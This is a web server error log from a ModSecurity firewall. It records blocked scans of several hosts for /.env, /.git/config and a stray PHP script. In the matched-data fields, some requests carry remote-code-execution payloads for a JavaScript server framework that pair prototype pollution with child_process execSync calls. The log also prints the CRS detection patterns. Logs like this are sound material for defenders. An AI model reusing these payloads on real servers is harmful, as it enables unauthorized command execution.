[Fri Dec 26 23:09:37.999983 2025] [:error] [pid 998243] [client 45.82.13.170:53024] [client 45.82.13.170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU8HoUsyVcj3IzS9rPJ-iwAAAAY"]
[Fri Dec 26 23:09:38.000155 2025] [:error] [pid 998243] [client 45.82.13.170:53024] [client 45.82.13.170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aU8HoUsyVcj3IzS9rPJ-iwAAAAY"]
[Sat Dec 27 03:29:18.587511 2025] [:error] [pid 1008733] [client 85.11.167.4:58760] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1766802558_4975',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efna9MPzHr0mLEbrrPwAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.587712 2025] [:error] [pid 1008733] [client 85.11.167.4:58760] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1766802558_4975',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [ [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efna9MPzHr0mLEbrrPwAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.587832 2025] [:error] [pid 1008733] [client 85.11.167.4:58760] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo vuln_1766802558_4975 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efna9MPzHr0mLEbrrPwAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.589191 2025] [:error] [pid 1008733] [client 85.11.167.4:58760] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efna9MPzHr0mLEbrrPwAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.589378 2025] [:error] [pid 1008733] [client 85.11.167.4:58760] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efna9MPzHr0mLEbrrPwAAAAY"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.767868 2025] [:error] [pid 1008709] [client 85.11.167.4:58776] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1766802558',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "app [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efo7pbIIJWqjXQXHX4gAAAAA"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.767982 2025] [:error] [pid 1008709] [client 85.11.167.4:58776] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?i)(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|`)\\\\s*[\\\\(,@\\\\'\\"\\\\s]*(?:[\\\\w'\\"\\\\./]+/|[\\\\\\\\'\\"\\\\^]*\\\\w[\\\\\\\\'\\"\\\\^]*:.*\\\\\\\\|[\\\\^\\\\.\\\\w '\\"/\\\\\\\\]*\\\\\\\\)?[\\"\\\\^]*(?:s[\\"\\\\^]*(?:y[\\"\\\\^]*s[\\"\\\\^]*(?:t[\\"\\\\^]*e[\\"\\\\^]*m[\\"\\\\^]*(?:p[\\"\\\\^]*r[\\"\\\\^]*o[\\"\\\\^]*p[\\"\\\\^]*e ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "298"] [id "932115"] [msg "Remote Command Execution: Windows Command Injection"] [data "Matched Data: {'timeout found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1766802558',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag " [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efo7pbIIJWqjXQXHX4gAAAAA"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.768052 2025] [:error] [pid 1008709] [client 85.11.167.4:58776] [client 85.11.167.4] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}} found within ARGS:0: {_response:{_formdata:{get:$1:constructor:constructor} _prefix:var res=process.mainmodule.require(child_process).execsync(echo test_1766802558 {timeout:30000}).tostring() throw object.assign(new error(next_redirect) {digest:`${res}`}) } reason:-1 status:resolved_model then:$1:__proto__:then value:{then: $b0}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efo7pbIIJWqjXQXHX4gAAAAA"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.769109 2025] [:error] [pid 1008709] [client 85.11.167.4:58776] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efo7pbIIJWqjXQXHX4gAAAAA"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 03:29:18.769255 2025] [:error] [pid 1008709] [client 85.11.167.4:58776] [client 85.11.167.4] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=15,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Efo7pbIIJWqjXQXHX4gAAAAA"], referer: https://economiasolidale.test.indacotrentino.com
[Sat Dec 27 04:38:38.749934 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Rule 7f555aa31898 [id "932110"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "258"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.750031 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Rule 7f555aa26760 [id "932115"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "298"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.752343 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Warning. Pattern match "(?i)\\\\b(?:s(?:e(?:t(?:_(?:e(?:xception|rror)_handler|magic_quotes_runtime|include_path)|defaultstub)|ssion_s(?:et_save_handler|tart))|qlite_(?:(?:(?:unbuffered|single|array)_)?query|create_(?:aggregate|function)|p?open|exec)|tr(?:eam_(?:context_create| ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "350"] [id "933160"] [msg "PHP Injection Attack: High-Risk PHP Function Call Found"] [data "Matched Data: eval(user_code); Promise.resolve(val).then(function(v) { var res_str = (typeof v === 'object') ? JSON.stringify(v) : String(v); try { res_str = zlib.deflateSync(res_str); } catch(e) {} var res_hex = global[String.fromCharCode(66,117,102,102,101,114)].from(res_str).toString('hex'); reject(Object.assign(new Error('RCE_RES'), { digest: res_hex })); }).catch(function(e) { reject(Object.assign(new Er..."] [severity "CRITICAL"] [ver "OWASP_C [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.752530 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Rule 7f555a677bf8 [id "933210"][file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"][line "504"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.752685 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.752830 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: String.fromCharCode found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x5c\\x22then\\x5c\\x22: \\x5c\\x22$B0\\x5c\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var reject_bridge = arguments[1]; (Promise.all([Function('return import(\\x5c\\x22node:child_process\\x5c\\x22)')(), Function('return import(\\x5c\\x22node:zlib\\x5c\\x22)')()]).then(([cp, zlib]) => { return new Promise((resolve, reject) => { ..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce" [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.754670 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Rule 7f555b2a9320 [id "941140"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "179"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.754803 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Rule 7f555b2a0030 [id "941160"][file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"][line "218"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.761295 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 04:38:38.761445 2025] [:error] [pid 1008733] [client 165.227.141.188:23936] [client 165.227.141.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=10,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/"] [unique_id "aU9Uvna9MPzHr0mLEbrrRAAAAAY"]
[Sat Dec 27 15:00:25.528371 2025] [php:error] [pid 1015891] [client 20.42.218.75:18118] script '/var/www/magento.test.indacotrentino.com/www/pub/images/m.php' not found or unable to stat
[Sun Dec 28 02:05:36.575895 2025] [:error] [pid 1028316] [client 62.60.131.162:51507] [client 62.60.131.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVCCYAfwhdK-kzWHooeV7AAAAAE"]
[Sun Dec 28 02:05:36.576163 2025] [:error] [pid 1028316] [client 62.60.131.162:51507] [client 62.60.131.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVCCYAfwhdK-kzWHooeV7AAAAAE"]
[Sun Dec 28 02:05:36.576350 2025] [:error] [pid 1028316] [client 62.60.131.162:51507] [client 62.60.131.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aVCCYAfwhdK-kzWHooeV7AAAAAE"]
[Sun Dec 28 02:23:04.581307 2025] [:error] [pid 1029974] [client 195.178.110.161:54450] [client 195.178.110.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVCGeGyU6FIsX8TK2RHgpwAAAAM"]
[Sun Dec 28 02:23:04.581663 2025] [:error] [pid 1029974] [client 195.178.110.161:54450] [client 195.178.110.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVCGeGyU6FIsX8TK2RHgpwAAAAM"]
[Sun Dec 28 02:23:04.581856 2025] [:error] [pid 1029974] [client 195.178.110.161:54450] [client 195.178.110.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aVCGeGyU6FIsX8TK2RHgpwAAAAM"]
[Sun Dec 28 16:43:24.527709 2025] [:error] [pid 1030680] [client 159.89.149.45:46678] [client 159.89.149.45] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271))) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271))).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVFQHC6iM-mXp65tVR0KCgAAAAI"]
[Sun Dec 28 16:43:24.528983 2025] [:error] [pid 1030680] [client 159.89.149.45:46678] [client 159.89.149.45] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVFQHC6iM-mXp65tVR0KCgAAAAI"]
[Sun Dec 28 16:43:24.529166 2025] [:error] [pid 1030680] [client 159.89.149.45:46678] [client 159.89.149.45] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/"] [unique_id "aVFQHC6iM-mXp65tVR0KCgAAAAI"]
